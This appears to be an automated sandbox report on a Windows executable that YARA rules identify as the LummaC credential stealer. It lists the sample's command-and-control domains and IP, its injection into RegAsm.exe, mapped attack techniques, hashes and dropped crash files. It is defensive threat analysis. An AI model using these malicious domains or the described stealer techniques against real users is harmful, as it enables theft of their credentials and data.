Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lootebarrkeyn.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 876008	Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Queries volume information: C:\Users\user\Desktop\FoS5cjKhd3.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FoS5cjKhd3.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gutterydhowi.shop	104.21.4.136	true	true		unknown
lootebarrkeyn.shop	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
fragnantbui.shop	true	unknown
lootebarrkeyn.shop	true	unknown
gutterydhowi.shop	true	unknown
offensivedzvju.shop	true	unknown
https://gutterydhowi.shop/api	true	unknown
drawzhotdog.shop	true	unknown
ghostreedmnu.shop	true	unknown
reinforcenh.shop	true	unknown
stogeneratmns.shop	true	unknown
vozmeatillu.shop	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://gutterydhowi.shop/apiC	RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gutterydhowi.shop/apiM	RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.7.dr	false	URL Reputation: safe	unknown
https://gutterydhowi.shop/	RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/acce	RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.4.136	gutterydhowi.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520608
Start date and time:	2024-09-27 16:46:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FoS5cjKhd3.exe renamed because original name is a hash value
Original Sample Name:	3b2250172cdc65f249533ad138ef8ab5.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/7@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 17 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: FoS5cjKhd3.exe

Simulations

Behavior and APIs

Time	Type	Description
10:47:10	API Interceptor	2x Sleep call for process: RegAsm.exe modified
10:47:16	API Interceptor	1x Sleep call for process: WerFault.exe modified
16:47:01	Task Scheduler	Run new task: {CB07D4C7-CA40-4A7C-819D-75C894487DC6} path: .

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.4.136	file.exe	Get hash	malicious	LummaC	Browse
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	U6b3tLFqN5.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	0UB3FIL25c.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	172.67.162.108
	https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://changeofscene.ladesk.com/605425-Secure-Business-Documen	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://careeligibility.vercel.app/chubedan	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	https://clicktracking.yellowbook.com/trackinguserwebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://femalewhowork.sa.com/rUswT/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://lkk6m.conownsup.com/tpgbE/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	bfINGx7hvL.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	bfINGx7hvL.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	U6b3tLFqN5.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	FACTORY NEW PURCHASE ORDER.doc	Get hash	malicious	Unknown	Browse	104.21.4.136
	Dev_Project.xls	Get hash	malicious	Unknown	Browse	104.21.4.136
	Purchase Inquiry-0012.xls	Get hash	malicious	Unknown	Browse	104.21.4.136

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_7e74a33335a2f965bc130b952e35e6871e573e3_5be246a5_ef375b0f-a442-4bce-a5f6-0408d35425df\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0954646420210803
Encrypted:	false
SSDEEP:	192:yBKTeFy/A+d/0BU/AjezEKv6+zuiFeZ24IO8Z:QOA+dsBU/AjeBFzuiFeY4IO8Z
MD5:	114DA399F8A3BB25664F749BD4659449
SHA1:	A5A93AC3D7BAA6372B16FE08FB6D7861EB6C88CF
SHA-256:	BC037B40B5A552196821BE90CB77BCF78B974B38DFD7AAC17C9512838DCFA08A
SHA-512:	0AEB25DD537CD50FF962A7A31F43F55FC17B78BD9D1F4768D4F2121A31C41910609B636D60D11163B79A7774BA0795F34714432E79988384582F9A8A310BBDE7
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.2.2.0.3.3.4.6.0.9.6.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.2.2.0.3.4.0.3.9.0.9.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.3.7.5.b.0.f.-.a.4.4.2.-.4.b.c.e.-.a.5.f.6.-.0.4.0.8.d.3.5.4.2.5.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.2.3.6.f.7.e.-.4.e.6.4.-.4.c.3.3.-.b.f.e.d.-.9.d.f.1.1.0.4.5.3.e.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.0.-.0.0.0.1.-.0.0.1.5.-.b.e.a.a.-.d.2.2.1.e.c.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDA4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Sep 27 14:47:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	114106
Entropy (8bit):	2.0672613676723275
Encrypted:	false
SSDEEP:	384:6cI9rEf5HnRXA7OEAB4Wl9FUOB1zypJSeG+aljljMR:DIJa5nC7fWdjSGzLw
MD5:	2648EDEC6909B180632674344210A5C9
SHA1:	DF1E24B5D45040AC1EF7EE2B846329CF560EF421
SHA-256:	97826F346931BEF6625D1ABDD5E4E9307C172A254BB579FFE6BDE5AE2CFA92D0
SHA-512:	49134A58FC16513926F78E42E1263AD888D79D0F4780DDF9AD729D085138A8A4D655E7A982385F6A8F28F49E9B705E42F5DEB025929D3D0464FD93620523323F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......q..f....................................T...\|%...........L..........`.......8...........T............D...x...........%...........'..............................................................................eJ......T(......GenuineIntel............T...........n..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEED.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6290
Entropy (8bit):	3.723809236009733
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbob6pY2QE/6ii5aM4UW89bOSsf9am:R6l7wVeJob6pY22prW89bOSsf9am
MD5:	787377886C867D498192A5CAF55AD39C
SHA1:	E854C4C7EB6E0BC3810202EE16ACD925F8E9D2AD
SHA-256:	F9641654E20036EC7B86B6329867DC4E2050033364967D876DEB845170EC9B40
SHA-512:	64C4B071202A89983A9093EC579906478157DBC104857AE8A407EE4563A8C9DF587AEAB85D4D093603252F93EC343C168665A23C666955A14BE2E6F93A894E8D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF3C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4628
Entropy (8bit):	4.448882349783517
Encrypted:	false
SSDEEP:	96:uIjf4I7iS7VDfyJfuDlV+tvJ9t5TBukukrd:uI0YiS7lenTghY
MD5:	26D437902AC6C050FEDD8684307F0443
SHA1:	7D65A2355554BC79794EBF9D1E5F82DEC552ED37
SHA-256:	80FE5083ADB7091F39964889F37823CBE44BC663BC8666B3E99489ED0E359743
SHA-512:	739B160FF16065FF50D520618781963A72F05F7C57C8AC333E0A11F4592DA301F39D46AFE62D475BAD99BD3798CE9F07A58DFCF12DC156EDF270913567DF8030
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="518749" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FoS5cjKhd3.exe.log

Download File

Process:	C:\Users\user\Desktop\FoS5cjKhd3.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469492474221903
Encrypted:	false
SSDEEP:	6144:RzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:JZHtYZWOKnMM6bFpQj4
MD5:	928D17460F29B55233ACED9DD5DA5A24
SHA1:	AADE2987F67A1B17B72190AA31B5254E62AC7726
SHA-256:	DEB997142DE9C309E68A37D5652B0916C6288883A8DC2870302A593AE1BAFB67
SHA-512:	B2A1B2B01E9E394D86FD1F2528BB744D0933B7ED3669D6E90513A9AFAF12733708C068EB4B4DAD9753767BCEC641E7DD31D17F0AE637BF4131F1079BDD397698
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\FoS5cjKhd3.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9892026359969215
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	FoS5cjKhd3.exe
File size:	375'296 bytes
MD5:	3b2250172cdc65f249533ad138ef8ab5
SHA1:	70d66ee841754f39e7abffeb8f980be3f1e50033
SHA256:	1622822b3f7f66537240b4760560550654eb2c23c1f57c7e4bb52d3cbc5edd5e
SHA512:	d84c97d55e09a2b82fc376678c133bfab49a01557891d5a85dc284da7e981df7ff0bf77bb98951b71d3eca4ef25d9819cb6ad85ff75afaf0c4da0e80d71e461c
SSDEEP:	6144:zhhct8bwd3MYhdPGRfvsaFP2s2k5yR7261AuXBAnRhCFiVBLbb/g3ipkai080i:b1bwlMUPGlvlP/2kER72eAuXinRhaMXN
TLSH:	9884234A3AD08763F4F5C6B28CB596A48F313F7BC98DE27BB1119E79125AD0593B0C14
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45ce3e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F691DC [Fri Sep 27 11:07:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
